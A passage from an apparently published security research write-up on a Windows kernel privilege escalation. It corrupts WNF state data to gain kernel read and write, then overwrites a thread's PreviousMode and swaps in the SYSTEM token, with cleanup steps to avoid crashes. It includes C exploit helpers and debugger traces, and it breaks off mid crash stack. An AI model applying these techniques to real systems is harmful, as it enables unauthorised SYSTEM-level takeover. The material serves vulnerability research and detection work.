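 * 20H2 x64) -- these can move between builds, so resolve them with
 * `dt nt!_WNF_NAME_INSTANCE` first. */
enum {
    OFF_STATE_NAME      = 0x28,
    OFF_SCOPE_INSTANCE  = 0x30,
    OFF_STATE_DATA      = 0x58,
    OFF_CREATOR_PROCESS = 0x98
};

/* Scan a snapshot of the adjacent pool memory (obtained via the
 * relative read) for the 03 09 a8 header bytes which mark the start
 * of a _WNF_NAME_INSTANCE. Returns the offset of the header within
 * the buffer, or -1 if not found. */
static ptrdiff_t find_name_instance(const uint8_t *buf, size_t len)
{
    static const uint8_t pattern[] = { 0x03, 0x09, 0xA8 };
    size_t i;

    /* Stop early enough that all interesting members are in range. */
    for (i = 0; i + OFF_CREATOR_PROCESS + 8 <= len; i++) {
        if (memcmp(buf + i, pattern, sizeof(pattern)) == 0)
            return (ptrdiff_t)i;
    }
    return -1;
}

/* Little-endian x64 target assumed throughout. */
static uint64_t read_u64(const uint8_t *p)
{
    uint64_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}
```

Once the header offset is known, CreatorProcess, StateName, StateData and ScopeInstance fall out as fixed-offset reads from it.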

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize and DataSize members preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values immediately preceding each location we wished to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the NtReadVirtualMemory and NtWriteVirtualMemory APIs to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used in order to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low level operations and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS and _KPROCESS, and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is not set when a user-mode thread executes the call, then the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }
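The gate that PreviousMode provides can be modelled with a small user-mode reimplementation of the bounds check from the decompilation above. The constants are taken directly from the listing; this is an illustration of the logic only (the probing of NumberOfBytesWritten is omitted), not the kernel's actual code.

```c
#include <assert.h>
#include <stdint.h>

#define STATUS_SUCCESS          0x00000000u
#define STATUS_ACCESS_VIOLATION 0xC0000005u  /* 3221225477 in the listing */
#define USER_ADDRESS_CEILING    0x7FFFFFFF0000ULL

/* Model of the PreviousMode gate in MiReadWriteVirtualMemory: when
 * PreviousMode == UserMode (1) both ranges must lie below the
 * user-mode ceiling and must not wrap; when PreviousMode ==
 * KernelMode (0) the check is skipped entirely, which is exactly
 * what the exploit abuses. */
static uint32_t check_ranges(uint64_t base, uint64_t buffer,
                             uint64_t len, int previous_mode)
{
    if (previous_mode) {
        if (base + len < base || base + len > USER_ADDRESS_CEILING ||
            buffer + len < buffer || buffer + len > USER_ADDRESS_CEILING)
            return STATUS_ACCESS_VIOLATION;
    }
    return STATUS_SUCCESS;
}
```

With PreviousMode forced to 0, a kernel-mode target address passes straight through where it would otherwise fail with STATUS_ACCESS_VIOLATION.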

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just prior to the _KPROCESS ThreadListHead Flink, we can leak out the Flink value by confusing it with the DataSize and the ChangeStamp. After querying the object we can calculate it as FLINK = ((uintptr_t)ChangeStamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
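These two calculations can be sketched as pure helper functions. The 0x2F8 ThreadListEntry offset is specific to the build tested (check it with `dt nt!_KTHREAD ThreadListEntry` on your target):

```c
#include <assert.h>
#include <stdint.h>

/* ThreadListEntry offset within _KTHREAD on the build tested
 * (Windows 10 20H2 x64) -- verify per build. */
#define KTHREAD_THREAD_LIST_ENTRY 0x2F8ULL

/* The two dwords returned by NtQueryWnfStateData as DataSize and
 * ChangeStamp actually overlay the low and high halves of the
 * ThreadListHead Flink pointer. */
static uint64_t flink_from_leak(uint32_t data_size, uint32_t change_stamp)
{
    return ((uint64_t)change_stamp << 32) | data_size;
}

/* Flink points at the ThreadListEntry inside the _KTHREAD, so the
 * structure base is a fixed subtraction away. */
static uint64_t kthread_from_flink(uint64_t flink)
{
    return flink - KTHREAD_THREAD_LIST_ENTRY;
}
```

Using the values from the earlier debugger output, 0xffffd18606a54378 - 0x2F8 gives back the _KTHREAD base 0xffffd18606a54080.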

Once we have the address of the _KTHREAD we again need to find sane values to confuse with the AllocatedSize and DataSize, to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

Allowing the most significant dword of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence the value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.
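A small user-mode model of this overlay, using a fake _KTHREAD buffer and the offsets from the dump above (Process at +0x220, UserAffinity at +0x228, PreviousMode at +0x232; all build-specific, and a little-endian x64 host is assumed), shows why the kernel accepts the confused values:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* _KTHREAD offsets on the build tested -- verify with dt. */
#define KT_PROCESS      0x220
#define KT_PREVIOUSMODE 0x232

/* The _WNF_STATE_DATA layout as the kernel will interpret it when
 * StateData points at kthread + 0x220. */
struct wnf_state_data_view {
    uint32_t header;          /* overlays Process pointer low dword  */
    uint32_t allocated_size;  /* overlays Process pointer high dword */
    uint32_t data_size;       /* overlays UserAffinity               */
    uint32_t change_stamp;    /* overlays UserAffinity fill (zero)   */
};

/* Given a snapshot of the _KTHREAD memory, return what the kernel
 * sees when it treats kthread + 0x220 as a _WNF_STATE_DATA. */
static struct wnf_state_data_view overlay_at(const uint8_t *kthread)
{
    struct wnf_state_data_view v;
    memcpy(&v, kthread + KT_PROCESS, sizeof(v));
    return v;
}
```

The state data payload then starts 0x10 bytes after the overlay, i.e. at +0x230, so a 3-byte DataSize covers offsets +0x230 through +0x232 and therefore reaches PreviousMode.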

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to 0xffff900f bytes of write if needed, though we only need 3 bytes), which includes PreviousMode (set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant dword of the pointer, which will always be a kernel-mode address, ensures that this is a sufficiently large AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a method which enables easier post exploitation and enhanced clean-up options.

It is then trivial to walk the ActiveProcessLinks within the _EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this, or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token, using techniques which have long been used by Windows exploits.
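A sketch of the token replacement over the arbitrary read/write primitives might look like the following. The read64/write64 stubs here operate on a flat local buffer so the list walk can be exercised in user mode; in the exploit they would be the PreviousMode-backed NtReadVirtualMemory/NtWriteVirtualMemory wrappers. The _EPROCESS offsets are those of the build tested and must be resolved per build.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* _EPROCESS offsets on the build tested (Windows 10 20H2 x64) --
 * resolve with `dt nt!_EPROCESS` on the target. */
#define EP_PID    0x440  /* UniqueProcessId    */
#define EP_LINKS  0x448  /* ActiveProcessLinks */
#define EP_TOKEN  0x4B8  /* Token              */

/* Stand-ins for the exploit's arbitrary read/write primitives,
 * backed by a flat buffer; "addresses" are offsets into g_mem. */
static uint8_t g_mem[0x4000];

static uint64_t read64(uint64_t addr)
{
    uint64_t v;
    memcpy(&v, g_mem + addr, 8);
    return v;
}

static void write64(uint64_t addr, uint64_t v)
{
    memcpy(g_mem + addr, &v, 8);
}

/* Walk ActiveProcessLinks from our own EPROCESS until the System
 * process (PID 4) is found, then copy its Token over ours. */
static void steal_system_token(uint64_t own_eprocess)
{
    uint64_t entry = read64(own_eprocess + EP_LINKS);   /* Flink */

    while (entry != own_eprocess + EP_LINKS) {          /* list is circular */
        uint64_t eprocess = entry - EP_LINKS;
        if (read64(eprocess + EP_PID) == 4) {
            write64(own_eprocess + EP_TOKEN, read64(eprocess + EP_TOKEN));
            return;
        }
        entry = read64(entry);
    }
}
```

A real exploit would also need to preserve the reference-count bits in the low nibble of the EX_FAST_REF token pointer; the sketch copies the value wholesale for simplicity.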

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging part for use in real-world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps in understanding how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, we end up with the following crash:

Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory API to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA pointed to by StateData is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we now have arbitrary read and write via the APIs, we can instead implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.
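A minimal sketch of this fix-up, with the arbitrary-write primitive stubbed over a local buffer and the 0x58 StateData offset taken from the build tested (verify it with `dt nt!_WNF_NAME_INSTANCE StateData`):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* StateData offset within _WNF_NAME_INSTANCE on the build tested. */
#define NI_STATE_DATA 0x58

/* Stand-ins for the exploit's arbitrary read/write primitives,
 * backed here by a flat buffer so the fix-up can be demonstrated in
 * user mode; "addresses" are offsets into g_mem. */
static uint8_t g_mem[0x1000];

static void write64(uint64_t addr, uint64_t v)
{
    memcpy(g_mem + addr, &v, 8);
}

static uint64_t read64(uint64_t addr)
{
    uint64_t v;
    memcpy(&v, g_mem + addr, 8);
    return v;
}

/* Put the saved, original StateData pointer back into the
 * _WNF_NAME_INSTANCE located by FindStateName, so the free on
 * process exit operates on the correct allocation. */
static void restore_state_data(uint64_t name_instance,
                               uint64_t original_state_data)
{
    write64(name_instance + NI_STATE_DATA, original_state_data);
}
```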

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef members of _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
